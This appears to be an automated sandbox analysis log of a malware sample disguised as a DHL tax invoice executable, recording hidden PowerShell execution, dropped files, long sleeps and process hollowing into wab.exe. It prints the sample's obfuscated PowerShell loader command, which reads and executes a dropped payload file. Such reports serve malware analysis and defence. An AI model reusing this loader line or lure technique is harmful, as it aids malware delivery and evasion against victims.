              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: DHL TAX INVOICES - MARCH 2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2317930133.0000000006C80000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbSt source: powershell.exe, 00000001.00000002.2317930133.0000000006D38000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2317930133.0000000006C80000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5Q source: powershell.exe, 00000001.00000002.2313644718.000000000079F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2317930133.0000000006C80000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: s\System.Core.pdb source: powershell.exe, 00000001.00000002.2320109196.0000000007EE6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2313644718.000000000079F000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: Yara matchFile source: 00000001.00000002.2320550123.000000000B115000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Panoramic=Get-Content 'C:\Users\user\AppData\Local\releve\Handelshindringens.Dec';$Voldtgtsforbryders=$Panoramic.SubString(51097,3);.$Voldtgtsforbryders($Panoramic)"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08881A89 pushad ; ret 1_2_08881A8F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08883082 push ebp; ret 1_2_08883090
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_088814AB push es; retf 1_2_088814B7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_088842D8 pushfd ; ret 1_2_088842E1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_088808E5 push 4FBC93B5h; iretd 1_2_0888092A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_088838F5 pushad ; ret 1_2_088838FB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08881818 push ecx; retf 1_2_0888182D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08884E17 push eax; retf 1_2_08884E18
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08883679 pushad ; ret 1_2_0888369B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08884BC6 pushad ; ret 1_2_08884BC7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_088849F2 pushad ; ret 1_2_088849F3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08881F01 push 00000067h; ret 1_2_08881F03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08881B7E pushad ; ret 1_2_08881B87
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_04463679 pushad ; ret 7_2_0446369B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_04464E17 push eax; retf 7_2_04464E18
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_04461818 push ecx; retf 7_2_0446182D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_044642D8 pushfd ; ret 7_2_044642E1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_044608E5 push 4FBC93B5h; iretd 7_2_0446092A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_044638F5 pushad ; ret 7_2_044638FB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_04463082 push ebp; ret 7_2_04463090
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_04461A89 pushad ; ret 7_2_04461A8F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_044614AB push es; retf 7_2_044614B7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_04461B7E pushad ; ret 7_2_04461B87
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_04461F01 push 00000067h; ret 7_2_04461F03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_04464BC6 pushad ; ret 7_2_04464BC7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_044649F2 pushad ; ret 7_2_044649F3
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeFile created: \dhl tax invoices - march 2024.exe
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeFile created: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dllJump to dropped file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\releve\DHL TAX INVOICES - MARCH 2024.exeJump to dropped file
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6831
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2894
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7240 | Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7896 | Thread sleep time: -35000s >= -30000s
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe | Code function: 0_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040596F
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe | Code function: 0_2_004064C1 FindFirstFileW,FindClose,0_2_004064C1
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe | Code function: 0_2_004027FB FindFirstFileW,0_2_004027FB
              Source: wab.exe, 00000007.00000002.2870944268.00000000089CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: wab.exe, 00000007.00000002.2870944268.000000000898B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0=
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe | API call chain: ExitProcess graph end node graph_0-3431
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe | API call chain: ExitProcess graph end node graph_0-3611
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_006ED6E0 LdrInitializeThunk,1_2_006ED6E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: 400000
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section unmapped: unknown base address: 400000
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
